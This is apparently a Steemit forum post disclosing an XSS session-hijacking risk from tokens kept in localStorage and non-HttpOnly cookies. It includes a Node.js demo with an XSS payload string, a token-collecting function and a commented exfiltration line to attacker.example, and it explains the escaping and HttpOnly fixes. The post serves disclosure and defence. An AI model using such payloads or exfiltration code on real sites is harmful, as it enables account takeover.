[SECURITY BUG] Steemit vulnerable to session hijacking


This bug could affect all users on Steemit!

Why?

Steemit keeps your session in the browser's local storage and in cookies. No additional protection is applied, so any script that runs on a Steemit page can read those values.

How?

Any malicious URL pasted here could lead to session hijacking: script smuggled in through such a link runs inside the Steemit page, reads your local storage and cookie contents, and sends them to the attacker. This is known as a cross-site scripting (XSS) attack. You would never notice it happened, but the consequences could be severe, up to a hijacked account.

How can I test this?

I won't reveal too much information in this post, to avoid enabling intentional XSS attacks. However, if you have basic knowledge of JavaScript, you'll be able to replicate the issue on your local machine.

If your knowledge of JavaScript is zero, then do some Google searching on XSS attacks.
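To make the "How?" section concrete, and to give a way to replicate the mechanism locally without touching Steemit, here is an added example. It is not Steemit's code and not the author's; it models, in plain Node.js, what an injected script can read from a page depending on where the session lives. The "browser" is a constructed object (no real DOM), and the storage key `session`, the cookie name `sid`, the token value and the attacker host are all assumptions for the demo.

```javascript
// Added example, not Steemit's code. Models the XSS session-theft mechanism:
// a script running in the site's origin reads client-side session storage.
// The browser below is a constructed stand-in; key/cookie names are assumptions.

// Minimal model of the parts of a browser an XSS payload touches.
function makeBrowser() {
  const jar = [];             // cookies: { name, value, httpOnly }
  const storage = new Map();  // window.localStorage
  return {
    setCookie(name, value, { httpOnly = false } = {}) {
      jar.push({ name, value, httpOnly });
    },
    // document.cookie as page scripts see it: HttpOnly cookies are omitted,
    // which is what keeps them out of reach of injected script.
    get documentCookie() {
      return jar
        .filter((c) => !c.httpOnly)
        .map((c) => `${c.name}=${c.value}`)
        .join('; ');
    },
    localStorage: {
      setItem: (k, v) => storage.set(k, String(v)),
      getItem: (k) => (storage.has(k) ? storage.get(k) : null),
    },
  };
}

// The injection point: user-controlled text rendered straight into HTML.
function renderUnsafe(name) {
  return `<p>Welcome, ${name}</p>`;             // vulnerable: markup passes through
}

// Output encoding: the fix for the injection point itself.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}
function renderSafe(name) {
  return `<p>Welcome, ${escapeHtml(name)}</p>`; // hardened: text stays text
}

// What the payload does once it runs inside the site's origin: collect every
// session value page script can see. A real payload would beacon `loot` out,
// e.g. fetch('https://attacker.example/?d=' + encodeURIComponent(JSON.stringify(loot))).
function stealSession(browser) {
  const loot = {};
  const fromStorage = browser.localStorage.getItem('session'); // assumed key name
  if (fromStorage !== null) loot.localStorage = fromStorage;
  if (browser.documentCookie) loot.cookie = browser.documentCookie;
  return loot;
}

// Scenario 1: token kept in localStorage and in a cookie without HttpOnly.
function weakSession() {
  const b = makeBrowser();
  b.localStorage.setItem('session', 'tok-abc123');   // assumed token value
  b.setCookie('sid', 'tok-abc123');                   // no HttpOnly flag
  return stealSession(b);
}

// Scenario 2: token only in an HttpOnly cookie, nothing in localStorage.
function hardenedSession() {
  const b = makeBrowser();
  b.setCookie('sid', 'tok-abc123', { httpOnly: true });
  return stealSession(b);
}

console.log('unsafe render :', renderUnsafe('<img src=x onerror=alert(1)>'));
console.log('safe render   :', renderSafe('<img src=x onerror=alert(1)>'));
console.log('weak session  :', JSON.stringify(weakSession()));
console.log('hardened      :', JSON.stringify(hardenedSession()));
```

Two things the model makes visible. First, the injection point is the root cause: `renderUnsafe` lets an attacker's markup (and therefore script) into the page, and `renderSafe` shows the encoding that stops it. Second, where the session is stored decides how bad a successful injection is: with the token in local storage or a plain cookie, `stealSession` walks away with it, while an HttpOnly cookie returns nothing to the script. HttpOnly is a damage limiter, not a cure; a script running in the origin can still make requests that the browser will send the victim's cookies along with, so the encoding fix at the injection point remains the primary one.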

OMG! Did you report this already?

The issue has been reported, along with a fix proposal to prevent this from happening.

Now what? Is my account in danger?

Your account is safe as long as you play by the rules of the internet.

Please, don't ever - for real! - click on a URL without knowing where it will lead you.

XSS hijacking is only one of many evil things that can happen to you when you click random links.

